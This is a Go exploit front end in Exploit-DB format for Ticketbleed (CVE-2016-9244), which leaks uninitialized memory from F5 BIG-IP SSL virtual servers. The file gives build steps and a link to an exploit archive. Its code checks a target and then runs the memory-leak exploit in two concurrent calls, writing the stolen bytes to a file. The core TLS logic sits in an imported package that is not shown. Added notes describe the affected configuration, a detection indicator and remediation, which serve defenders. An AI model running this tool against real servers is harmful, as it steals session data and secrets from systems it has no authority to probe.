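/*
# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]
# Date: [10.02.2017]
# Exploit Author: [Ege Balcı]
# Vendor Homepage: [https://f5.com/]
# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]
# Tested on: [Multiple]
# CVE : [CVE-2016-9244]

BUILD:

	go get github.com/EgeBalci/Ticketbleed
	go build Ticketbleed.go

USAGE:

	./ticketbleed

OPTIONS:

	-o, --out   Output filename for raw memory
	-s, --size  Size in bytes to read
	-h, --help  Print this message

Archive referenced by the original listing:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41298.zip

Defender notes:

CVE-2016-9244 applies to the BIG-IP versions listed above when a virtual
server uses a Client SSL profile with the non-default Session Tickets option
enabled. When a client resumes a session with a Session ID shorter than 32
bytes, the server answers with a 32-byte Session ID whose remainder is
uninitialized memory, so up to 31 bytes leak per handshake.

Observable indicator: a ServerHello carrying a 32-byte Session ID in reply to
a ClientHello that offered a session ticket together with a shorter Session ID.

Remediation: upgrade to a fixed release, or disable Session Tickets on the
affected Client SSL profiles until the upgrade is done.

This file is only the command-line front end. The TLS handling lives in the
imported github.com/EgeBalci/Ticketbleed package, which is not shown here.
*/
package main

import (
	"fmt"
	"os"
	"strconv"
	"strings"

	"github.com/EgeBalci/Ticketbleed"
)

// OutputFile is the path given with -o/--out; it stays empty when the option
// is absent.
var OutputFile string = ""

// BleedSize is the byte count given with -s/--size; it stays 0 when the
// option is absent.
var BleedSize int = 0

// optionValue returns the argument that follows args[i]. When the option is
// the last argument there is no value to read, so the usage text is printed
// and the process exits with status 1. The original indexed args[i+1]
// unconditionally and panicked with an index-out-of-range in that case.
func optionValue(args []string, i int) string {
	if i+1 >= len(args) {
		fmt.Println(Help)
		os.Exit(1)
	}
	return args[i+1]
}

// main parses the command line, probes that the output file can be created,
// and hands the target to the Ticketbleed package.
//
// The first argument is passed unchanged to Ticketbleed.Check and
// Ticketbleed.Exploit as the target. Between one and five arguments are
// accepted; anything else prints the usage text and exits with status 1.
func main() {
	args := os.Args[1:]
	if len(args) < 1 || len(args) > 5 {
		fmt.Println(Help)
		os.Exit(1)
	}

	for i := 0; i < len(args); i++ {
		switch args[i] {
		case "-h", "--help":
			fmt.Println(Help)
			os.Exit(1)
		case "-o", "--out":
			OutputFile = optionValue(args, i)
			i++ // the value was consumed; do not re-read it as an option
		case "-s", "--size":
			size, err := strconv.Atoi(optionValue(args, i))
			if err != nil {
				fmt.Println("[-] ERROR: Invalid size value !")
				os.Exit(1)
			}
			if size < 0 {
				fmt.Println("[-] ERROR: Size can't be smaller than 0")
				os.Exit(1)
			}
			BleedSize = size
			i++ // the value was consumed; do not re-read it as an option
		}
	}

	// The target is positional. An option in the first slot means no target
	// was supplied, so stop before touching the filesystem or the network.
	target := args[0]
	if strings.HasPrefix(target, "-") {
		fmt.Println(Help)
		os.Exit(1)
	}

	if OutputFile != "" {
		// Create (and truncate) the file up front so an unwritable path is
		// reported before any network activity. The handle is not kept.
		file, createErr := os.Create(OutputFile)
		if createErr != nil {
			fmt.Println("[-] ERROR: While creating output file !")
			os.Exit(1)
		}
		file.Close()
		fmt.Println("[*] Output file: " + OutputFile)
	}

	// Check runs first and its report is printed. Exploit is only invoked
	// when that report contains the "[+]" marker.
	status := Ticketbleed.Check(target)
	fmt.Println(status)
	if strings.Contains(status, "[+]") {
		// Author's note: the requested size is split across two concurrent
		// calls because a single stream of requests makes the server echo
		// back many duplicate values.
		go Ticketbleed.Exploit(target, OutputFile, (BleedSize / 2))
		Ticketbleed.Exploit(target, OutputFile, (BleedSize / 2))
	}
}

// Help is the banner and usage text printed for -h/--help and for malformed
// invocations. The text is reproduced exactly as it appears in this listing,
// which has lost the banner's original line breaks.
var Help string = ` ▄▄▄█████▓ ██▓ ▄████▄ ██ ▄█▀▓█████▄▄▄█████▓ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ ▓ ██▒ ▓▒▓██▒▒██▀ ▀█ ██▄█▒ ▓█ ▀▓ ██▒ ▓▒▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌ ▒ ▓██░ ▒░▒██▒▒▓█ ▄ ▓███▄░ ▒███ ▒ ▓██░ ▒░▒██▒ ▄██▒██░ ▒███ ▒███ ░██ 
█▌ ░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄░ ▓██▓ ░ ▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌ ▒██▒ ░ ░██░▒ ▓███▀ ░▒██▒ █▄░▒████▒ ▒██▒ ░ ░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ ▒ ░░ ░▓ ░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒ ░░ ░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ ░ ▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ ░ ▒ ░░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ Author: Ege Balci Github: github.com/EgeBalci USAGE: ./ticketbleed OPTIONS: -o, --out Output filename for raw memory -s, --size Size in bytes to read -h, --help Print this message `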